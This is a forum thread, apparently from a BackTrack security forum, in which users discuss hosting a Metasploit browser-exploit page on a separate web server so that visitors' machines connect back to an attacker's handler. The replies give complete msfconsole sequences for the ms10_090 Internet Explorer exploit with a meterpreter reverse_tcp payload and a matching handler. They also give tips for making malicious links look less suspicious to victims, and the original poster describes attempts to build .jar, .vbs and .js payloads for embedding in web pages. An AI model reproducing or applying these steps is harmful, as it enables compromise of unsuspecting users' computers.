Results 1 to 7 of 7

Thread: Metasploit server

  1. #1
    Good friend of the forums comaX's Avatar
    Join Date
    Feb 2010
    Location
    Paris, France
    Posts
    338

    Default Metasploit server

    Hi everyone !
    In browser attacks, a server is launched on BT but i would like to "move the server" ; let me explain : instead of going to http://192.168.1.2:8080/test for example (which is my bt machine adress with malicious webpage), I would like to export the malicious webpage to another server. Then i would just have to launch the handler on the bt machine.

    Is that possible, if yes, how to ?

    Ps: for those wondering what's the use, well not so much... I would just like to know, the same way I wanted to know metasploit, with no goal.
    Ps2 : Sorry for grammar errors and Co, english is not my native langage.

  2. #2
    Developer
    Join Date
    Mar 2007
    Posts
    6,126

    Default Re: Metasploit server

    Well there are two different variables to set. Lhost is the attacking box and srvhost is the server host. Explore changing the server host.

  3. #3
    Good friend of the forums comaX's Avatar
    Join Date
    Feb 2010
    Location
    Paris, France
    Posts
    338

    Default Re: Metasploit server

    Thanks for the fast answer. I tried modifying SRVHOST, server was not started (as expected). But I couldn't get to do what I wanted...

    the parameters are :
    SRVHOST = Com.org - Only the best links ... (the server I would like the webpage to be to... Of course i didn't expect a page to show up on the server out of nowhere)
    SRVHOST = 80
    URIPATH = test

    Handler caught signal when i entered the http://LHOST:SRVPORT/test but I don't comprehend what SRVHOST has to do with anything...

    I'll dig some more but I really have no idea how to move the webpage... Isn't there a way to "export" the malicious webpage as *.html and then host it elsewhere ?

  4. #4
    Senior Member iproute's Avatar
    Join Date
    Jan 2010
    Location
    Midwest, USA
    Posts
    192

    Default Re: Metasploit server

    What is this second machine you are wanting to run the server on, windows or linux? I would run the metasploit framework(exploit)on your 'webserver' machine, point the reverse payload to you 'handler' machine IP, and set the option
    Code:
    msf exploit(ms10_090_ie_css_clip) > set DisablePayloadHandler=true
    Then start the metasploit framework(handler) on your 'handler' machine.

    With my exploit example, I usually set
    srvhost=0.0.0.0 <--- tells the framework what IP address for the http server to listen on
    srvport=80 <--- what port the http server will listen on.
    uripath=/ <--- the webserver directory structure. Keeping it at / helps things stay simple.



    So in other words, on your webserver machine you might start the framework and do this
    Code:
     
    use windows/browser/ms10_090_ie_css_clip
    set srvhost 192.168.0.50 (this is your webserver machine IP)
    set srvport 80
    set uripath /
    set payload windows/meterpreter/reverse_tcp
    set lhost 192.168.0.75 (this is your handler machine IP)
    set lport 9999
    set DisablePayloadHandler=true
    exploit
    and on your handler machine you would start the framework and do this
    Code:
    use exploit/multi/handler
    set payload windows/meterpreter/reverse_tcp
    set lhost 0.0.0.0
    set lport 9999
    exploit

  5. #5
    Good friend of the forums comaX's Avatar
    Join Date
    Feb 2010
    Location
    Paris, France
    Posts
    338

    Default Re: Metasploit server

    First of all, thank you !

    I think that would be a good way to do that, but it requires two machines equipped with msf. And what I had in mind was creating the webpage on BT along with the payload. Then hosting the webpage on a server, so that when the page is visited, it connects back to the handler on the bt machine.

    The server I use is wampserver on windows. I started the server to discover html, php and mysql few days ago and as I used an exploit that required a webpage, I thought of hosting the page on the wampserver, so that the page looks "normal", and not
    Code:
    http://adress:port/
    which is suspicious. but for stealth purpose, I guess linking from a website to the malicious webpage would do the trick as people tend not to verify the URLs.

    Can you think of any way to do that ?

    From what you said and research I've done I'd say it can't be done, but it would be interesting to do.

    About the srvhost : if I understand correctly, it is used to define the interface to use for listening ? So it generally is the local host IP adress, or 0.0.0.0 for all interfaces. Is there other ways to use this ?
    Last edited by comaX; 12-22-2010 at 12:13 PM.

  6. #6
    Senior Member iproute's Avatar
    Join Date
    Jan 2010
    Location
    Midwest, USA
    Posts
    192

    Default Re: Metasploit server

    If you set srvport to 80 then the URL you 'give' to victims is just h t t p://malicous.webserver.com/
    and no port like :8080 needs to be at the end of the URL.
    Again uripath is also useful as sometimes if you don't specify / as the path then the link ends up looking like
    h t t p://malicious.webserver.com/ad45trfHY3
    which is also somewhat suspicious

    And yes you are correct, setting 0.0.0.0 for srvhost listens on all IP interfaces, and is generally easiest.


    Also, metasploit is available on windows as well, so maybe just install MSF using the windows installer. Equipping two machines with MSF should be no problem, even if one is a windows host.
    MSF for windows

    Regarding creating the webpage on BT msf and exporting to windows webserver, maybe try viewing the source of the page created on the BT machine perhaps. You may actually need to dig into some of the framework's ruby to see how exactly it is configuring the webserver/exploit combo. When it comes to digging into the code, you may want to consider visiting the #metasploit channel on freenode's IRC and asking the developers some questions. They can often point you in the right direction.



    EDIT: It sort of sounds like you're just having difficulty with how the link ends up looking? the default settings for the exploit I mentioned above for instance might look like http;//malicious.webserver.com:8080/df45DfrT67Yt
    Just try the settings I suggested of
    Code:
    set srvport 80
    set uripath /
    which should clean up the link as I mentioned above, and let us know if that is what you were really looking for. The second server should not be needed with these settings
    Last edited by iproute; 12-22-2010 at 07:30 PM.

  7. #7
    Good friend of the forums comaX's Avatar
    Join Date
    Feb 2010
    Location
    Paris, France
    Posts
    338

    Default Re: Metasploit server

    I think this answers part of the question : I read quickly through it because I don't really have the time right now, but it seems that if you create a malicious java applet and host it on your server, this will do just as designed.

    I'll dig some more when I have time and keep you posted in case of success.

    I stumbled upon this while trying to generate .jar payload, which was an epic failure. So, if you know how to do that, please tell !
    (I used /java/meterpreter/reverse_tcp and tried generating with following commands :
    Code:
    generate -f java_evil.jar -t java
    generate -f java_evil.jar -t java -x workingjar.jar -k
    and both produced mamfunctionning jars...)

    What I basically want to do is done by SET, but then again, it will be hosted on the BT machine. Maybe is there a way to output the java applet so that it can be hosted elsewhere ? Or if there is no proper output, maybe it could be harvested is some way ? Then again, if you have any idea... Please tell ! I'll of course keep searching.


    As for :80 and URIPATH / i didn't think of it, and it sure works But I can't use the port 80 for it is already in use by the server I intend to host a malicious page on... I also tried msf on windows but even with exceptions set, my AV was going all crazy, and still is, long after (not so proper) uninstallation, so I decided just to not use msf on windows.

    Also, maybe I should post in other threads, but since it may be relevant to this topic : i generated .js and .vbs payloads, thinking I could use them in
    Code:
    <script language="blabla" src="blabla.extension"> </script>
    but it didn't work, at all.
    Since the .js didn't work in windows, it's not so surprising, but the .vbs did launch a meterpreter session when executed in explorer, but failed from browser. Maybe my tags are wrong... I also tried with
    Code:
    <script language="blabla" > actual_vbs_or_js_script </script>
    but it didn't work either.

    Any idea about how to do that ?
    Last edited by comaX; 01-06-2011 at 10:52 PM.

Similar Threads

  1. Replies: 17
    Last Post: 04-07-2011, 10:00 PM
  2. Replies: 2
    Last Post: 11-30-2010, 11:55 PM
  3. [Howto] [Metasploit] Introducao ao Metasploit - Parte 01
    By espreto in forum Tutoriais e Howtos
    Replies: 16
    Last Post: 10-13-2010, 04:21 PM
  4. Metasploit Framework - Server Started - No Server Started
    By mcurran in forum Beginners Forum
    Replies: 1
    Last Post: 02-07-2010, 01:11 AM
  5. VMware Server and Windows Server 2003
    By Zo7779 in forum OLD General IT Discussion
    Replies: 3
    Last Post: 05-08-2008, 05:53 AM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •